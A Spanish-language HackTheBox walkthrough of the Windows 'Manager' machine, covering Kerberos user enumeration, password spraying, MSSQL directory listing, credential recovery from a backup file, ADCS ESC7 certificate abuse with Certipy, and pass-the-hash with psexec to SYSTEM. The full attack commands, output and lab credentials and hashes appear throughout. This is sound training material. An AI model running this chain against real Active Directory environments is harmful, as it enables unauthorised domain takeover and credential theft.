Manager – HackTheBox Link to heading
- OS: Windows
- Dificultad: Medium / Media
- Plataforma: HackTheBox
User / Usuario Link to heading
El scan de Nmap muestra múltiples puertos abiertos, entre ellos tenemos: 80 HTTP, 88 Kerberos, 135 Microsoft RPC, 389 Lightweight Directory Access Protocol (LDAP), 445 Server Message Block (SMB), 1433 Microsoft SQL Server (MSSQL), 5985 Windows Remote Management (WinRM) y más…
❯ sudo nmap -sVC -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49669,49670,49671,49731,63231,63253,63296 10.10.11.236 -oN targeted
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-11 21:14 -03
Nmap scan report for 10.10.11.236
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-12 07:14:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-12T07:16:02+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-12T07:16:03+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-12T07:04:01
|_Not valid after: 2054-03-12T07:04:01
|_ssl-date: 2024-03-12T07:16:02+00:00; +7h00m00s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-12T07:16:02+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-12T07:16:03+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49731/tcp open msrpc Microsoft Windows RPC
63231/tcp filtered unknown
63253/tcp open msrpc Microsoft Windows RPC
63296/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
| date: 2024-03-12T07:15:22
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.46 seconds
Visitando el sitio web HTTP tenemos la siguiente página:
Exploro y pruebo cosas en ella, pero no hallo nada interesante.
Luego, usaré NetExec (el sucesor de CrackMapExec) para empezar a recolectar información del servicio SMB:
❯ netexec smb 10.10.11.236
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
de manera que tenemos una máquina llamada DC01 y un dominio manager.htb.
Decido agregar la línea 10.10.11.236 manager.htb a mi archivo /etc/hosts para futuros usos:
❯ echo '10.10.11.136 manager.htb' | sudo tee -a /etc/hosts
También usaré enum4linux-ng (el cual es enum4linux, pero escrito en Python en vez de Pearl; y el cual puede ser descargado desde su repositorio de Github) para tratar de obtener información adicional:
❯ python3 /home/gunzf0x/GitStuff/enum4linux-ng/enum4linux-ng.py 10.10.11.236
ENUM4LINUX - next generation
==========================
| Target Information |
==========================
[*] Target ........... 10.10.11.236
[*] Username ......... ''
[*] Random Username .. 'dimuwiga'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
<SNIP>
===========================================================
| Domain Information via SMB session for 10.10.11.236 |
===========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DC01
NetBIOS domain name: MANAGER
DNS domain: manager.htb
FQDN: dc01.manager.htb
Derived membership: domain member
Derived domain: MANAGER
=========================================
| RPC Session Check on 10.10.11.236 |
=========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[+] Server allows session using username 'dimuwiga', password ''
[H] Rerunning enumeration with user 'dimuwiga' might give more results
<SNIP>
=========================================
| Printers via RPC for 10.10.11.236 |
=========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 33.12 seconds
pero no puedo ver información nueva fuera de la ya encontrada por NetExec para los dominios del servicio.
Debido a que tenemos un servicio Kerberos y el scan de NetExec, sospecho que estamos ante un ecosistema Active Directory
Dado que no podemos enumerar usuarios usando Microsoft RPC (no es posible loguearse anónimamente usando rpcclient), trataré de obtenerlos usando Kerbrute y un diccionario de usuarios típicos sacado de SecLists:
❯ kerbrute userenum -d manager.htb --dc 10.10.11.236 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 50
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/11/24 - Ronnie Flathers @ropnop
2024/03/11 21:34:32 > Using KDC(s):
2024/03/11 21:34:32 > 10.10.11.236:88
2024/03/11 21:34:33 > [+] VALID USERNAME: ryan@manager.htb
2024/03/11 21:34:34 > [+] VALID USERNAME: guest@manager.htb
2024/03/11 21:34:35 > [+] VALID USERNAME: cheng@manager.htb
2024/03/11 21:34:35 > [+] VALID USERNAME: raven@manager.htb
2024/03/11 21:34:39 > [+] VALID USERNAME: administrator@manager.htb
2024/03/11 21:34:45 > [+] VALID USERNAME: Ryan@manager.htb
2024/03/11 21:34:46 > [+] VALID USERNAME: Raven@manager.htb
2024/03/11 21:34:49 > [+] VALID USERNAME: operator@manager.htb
2024/03/11 21:35:19 > [+] VALID USERNAME: Guest@manager.htb
2024/03/11 21:35:19 > [+] VALID USERNAME: Administrator@manager.htb
2024/03/11 21:35:42 > [+] VALID USERNAME: Cheng@manager.htb
2024/03/11 21:36:49 > [+] VALID USERNAME: jinwoo@manager.htb
2024/03/11 21:37:01 > [+] VALID USERNAME: RYAN@manager.htb
2024/03/11 21:37:40 > [+] VALID USERNAME: RAVEN@manager.htb
2024/03/11 21:37:42 > [+] VALID USERNAME: GUEST@manager.htb
2024/03/11 21:38:46 > [+] VALID USERNAME: Operator@manager.htb
2024/03/11 21:45:51 > [+] VALID USERNAME: OPERATOR@manager.htb
<SNIP>
Como vemos encontramos usuarios, los cuales guardo en un archivo:
❯ cat users.txt
ryan
operator
guest
cheng
raven
administrator
jinwoo
Luego, intento un simple Password Spray usando las credenciales username:username con NetExec:
❯ netexec smb 10.10.11.236 -u users.txt -p users.txt --continue-on-success
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\operator:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\jinwoo:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:operator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:operator STATUS_LOGON_FAILURE
<SNIP>
de manera que encontramos unas credenciales válidas: operator:operator
Ahora que tengo un usuario, uso rpcclient para chequear usuarios en el dominio:
❯ rpcclient -U 'operator%operator' 10.10.11.236 -c 'enumdomusers' | awk '{print $1}' | awk -F ':' '{print $2}' | tr -d "[]"
Administrator
Guest
krbtgt
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator
y, solo por si acaso, los guardo en un archivo para más tarde
Además, usando NetExec también, chequeo si estas credenciales son válidas para algún otro servicio que estaba corriendo en la máquina. Y lo son, esta credencial es reutilizada para el servicio Microsoft SQL Server (MSSQL):
❯ netexec mssql 10.10.11.236 -u 'operator' -p 'operator'
MSSQL 10.10.11.236 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.10.11.236 1433 DC01 [+] manager.htb\operator:operator
y veo que las credenciales operator:operator también funcionan para este servicio
Ahora usaré impacket-mssqlclient de la librería Impacket con esta credencial:
❯ impacket-mssqlclient managet.htb/operator:'operator'@10.10.11.236
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'operator'.
y no funciona. Pero si agrego la flag -windows-auth sí funciona:
❯ impacket-mssqlclient managet.htb/operator:'operator'@10.10.11.236 -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>
Trato de ejecutar comandos usando xp_cmdshell, pero no puedo. Tampoco se me permite “activar” las opciones para correr xp_cmdshell:
<SNIP>
SQL (MANAGER\Operator guest@master)> xp_cmdshell whoami
[-] ERROR(DC01\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (MANAGER\Operator guest@master)> enable_xp_cmdshell
[-] ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (MANAGER\Operator guest@master)>
Luego de jugar con algunos parametros (y luego de seguir algunas instrucciones de HackTricks Pentesting MSSQL) encuentro algo curioso. Dado que teníamos un servicio/servidor HTTP puede que haya un directorio localizado en C:\inetpub\wwwroot:
<SNIP>
SQL (MANAGER\Operator guest@master)> EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
Aparentemente, estos archivos están públicos en la página web con protocolo HTTP. Además, noto que hay un archivo bastante inusual y curioso: website-backup-27-07-23-old.zip
De manera que descargo el archivo con el comando wget:
❯ wget http://10.10.11.236/website-backup-27-07-23-old.zip
--2024-03-11 22:15:14-- http://10.10.11.236/website-backup-27-07-23-old.zip
Connecting to 10.10.11.236:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’
website-backup-27-07-23-old.zip 100%[=======================================================================================>] 1021K 518KB/s in 2.0s
2024-03-11 22:15:16 (518 KB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]
Muevo este archivo descargado en un nuevo directorio y unzipeo/extraigo los archivos contenidos dentro de éste:
❯ mkdir backup_found
❯ mv website-backup-27-07-23-old.zip backup_found
❯ cd backup_found
❯ unzip website-backup-27-07-23-old.zip
Archive: website-backup-27-07-23-old.zip
inflating: .old-conf.xml
inflating: about.html
inflating: contact.html
inflating: css/bootstrap.css
inflating: css/responsive.css
inflating: css/style.css
inflating: css/style.css.map
inflating: css/style.scss
inflating: images/about-img.png
inflating: images/body_bg.jpg
extracting: images/call.png
extracting: images/call-o.png
inflating: images/client.jpg
inflating: images/contact-img.jpg
extracting: images/envelope.png
extracting: images/envelope-o.png
inflating: images/hero-bg.jpg
extracting: images/location.png
extracting: images/location-o.png
extracting: images/logo.png
inflating: images/menu.png
extracting: images/next.png
extracting: images/next-white.png
inflating: images/offer-img.jpg
inflating: images/prev.png
extracting: images/prev-white.png
extracting: images/quote.png
extracting: images/s-1.png
extracting: images/s-2.png
extracting: images/s-3.png
extracting: images/s-4.png
extracting: images/search-icon.png
inflating: index.html
inflating: js/bootstrap.js
inflating: js/jquery-3.4.1.min.js
inflating: service.html
Entre estos archivos puedo ver un archivo llamado .old-conf.xml:
❯ ls -la
total 1092
drwxr-xr-x 5 gunzf0x gunzf0x 4096 Mar 11 22:18 .
drwxr-xr-x 3 gunzf0x gunzf0x 4096 Mar 11 22:18 ..
-rw-r--r-- 1 gunzf0x gunzf0x 5386 Jul 27 2023 about.html
-rw-r--r-- 1 gunzf0x gunzf0x 5317 Jul 27 2023 contact.html
drwxr-xr-x 2 gunzf0x gunzf0x 4096 Mar 11 22:18 css
drwxr-xr-x 2 gunzf0x gunzf0x 4096 Mar 11 22:18 images
-rw-r--r-- 1 gunzf0x gunzf0x 18203 Jul 27 2023 index.html
drwxr-xr-x 2 gunzf0x gunzf0x 4096 Mar 11 22:18 js
-rw-r--r-- 1 gunzf0x gunzf0x 698 Jul 27 2023 .old-conf.xml
-rw-r--r-- 1 gunzf0x gunzf0x 7900 Jul 27 2023 service.html
-rw-r--r-- 1 gunzf0x gunzf0x 1045328 Jul 27 2023 website-backup-27-07-23-old.zip
el cual, si lo leemos, contiene credenciales:
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
de manera que hallamos una credencial: raven:R4v3nBe5tD3veloP3r!123. Noto que el usuario raven había sido previamente encontrado con los scans de Kerbrute y con el comando rpcclient enumdomusers, de manera que este usuario debería de existir en la máquina víctima.
Chequeo si me puedo conectar a la máquina víctima via WinRM con esta credencial:
❯ netexec winrm 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.10.11.236 5985 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)
y, ya que las credenciales son válidas, me conecto a la máquina víctima usando evil-winrm:
❯ evil-winrm -i 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents>
Podemos obtener la flag de usuario en el Desktop de Raven
NT Authority/System - Administrator / Administrador Link to heading
Chequeo mis grupos como Raven en la máquina víctima, pero nada interesante:
*Evil-WinRM* PS C:\Users\Raven\Documents> net user Raven
User name Raven
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 7/27/2023 8:23:10 AM
Password expires Never
Password changeable 7/28/2023 8:23:10 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/12/2024 1:19:39 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Luego de buscar algunas vulnerabilidades y servicios corriendo en el sistema, no hallo nada muy interesante. De manera que decido chequear los certificados que puedan haber en esta máquina. Para esto decido usar un binario de Certify.exe (el cual podemos descargar desde su repositorio de Github), y subirlo a la máquina con evil-winrm. Esto lo hacemos para chequear si Active Directory Certificate Services (ADCS) está corriendo en la máquina:
*Evil-WinRM* PS C:\Users\Raven\Documents> upload ../exploits/Certify.exe
Info: Uploading /home/gunzf0x/HTB/HTBMachines/Medium/Manager/content/../exploits/Certify.exe to C:\Users\Raven\Documents\Certify.exe
Data: 232104 bytes of 232104 bytes copied
lo ejecutamos:
*Evil-WinRM* PS C:\Users\Raven\Documents> .\Certify.exe find -vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=manager,DC=htb'
[*] Listing info about the Enterprise CA 'manager-DC01-CA'
Enterprise CA Name : manager-DC01-CA
DNS Hostname : dc01.manager.htb
FullName : dc01.manager.htb\manager-DC01-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=manager-DC01-CA, DC=manager, DC=htb
Cert Thumbprint : ACE850A2892B1614526F7F2151EE76E752415023
Cert Serial : 5150CE6EC048749448C7390A52F264BB
Cert Start Date : 7/27/2023 3:21:05 AM
Cert End Date : 7/27/2122 3:31:04 AM
Cert Chain : CN=manager-DC01-CA,DC=manager,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Deny ManageCA, Read MANAGER\Operator S-1-5-21-4078382237-1492182817-2568127209-1119
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Allow ManageCA, Enroll MANAGER\Raven S-1-5-21-4078382237-1492182817-2568127209-1116
Allow Enroll MANAGER\Operator S-1-5-21-4078382237-1492182817-2568127209-1119
Enrollment Agent Restrictions : None
<SNIP>
Veo que el usuario Raven tiene Allow ManageCA activado, de manera que podemos tratar de atacar por este lado.
Noto que hay un template con nombre SubCA, de manera que puede ser vulnerable a ESC7, tal cual está explicado en la página de ‘certipy’. Seguimos las instrucciones de la página web.
Usando Certipy tratamos de jugar con los certificados para hacer la escalada de privilegios:
❯ certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
❯ certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
❯ certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate
pero cuando solicito el certificado, éste falla…
❯ certipy ca -ca "manager-DC01-CA" -issue-request 13 -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
incluso si, como podemos ver, el parámetro -issue-request pide por un id, el cual es 13 en mi caso (puede que en el suyo sea distinto). Esto se puede ver en los comandos de un poquito más arriba.
No obstante, si corro todos los comandos de nuevo, pero esta vez en una sola línea, sí funciona:
❯ certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' && certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' && certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb && certipy ca -ca "manager-DC01-CA" -issue-request 13 -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' && certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca "manager-DC01-CA" -target manager.htb -retrieve 13
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 14
Would you like to save the private key? (y/N) y
[*] Saved private key to 14.key
[-] Failed to request certificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'
Finalmente, trato de usar este certificado para obtener el hash del usuario administrator:
❯ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
pero obtengo un error: KRB_AP_ERR_SKEW(Clock skew too great)
Información
Si este error les ocurre, deberían tratar de sincronizar el tiempo con el servicio Kerberos corriendo en nuestra máquina el comando:
sudo ntpdate -u manager.htb
Luego de sincronizar el tiempo, inmediatamente corro:
❯ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
y esta vez sí funciona.
Advertencia
Si esto vuelve a fallar, tienen que seguir actualizando/sincronizando el tiempo con
Kerberos con el comando mostrado anteriormente hasta que funcione… Lo realmente importante aquí es ya haber obtenido el archivo administrator.pfxDado que obtuvimos un hash y, además, el servicio SMB está corriendo en la máquina podemos tratar de realizar un Pass The Hash usando psexec.py:
❯ rlwrap python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef administrator@manager.htb cmd.exe
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on manager.htb.....
[*] Found writable share ADMIN$
[*] Uploading file prIDvUQr.exe
[*] Opening SVCManager on manager.htb.....
[*] Creating service fldL on manager.htb.....
[*] Starting service fldL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4974]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
donde, finalmente, podemos obtener la flag en el Desktop del usuario Administrator
~Happy Hacking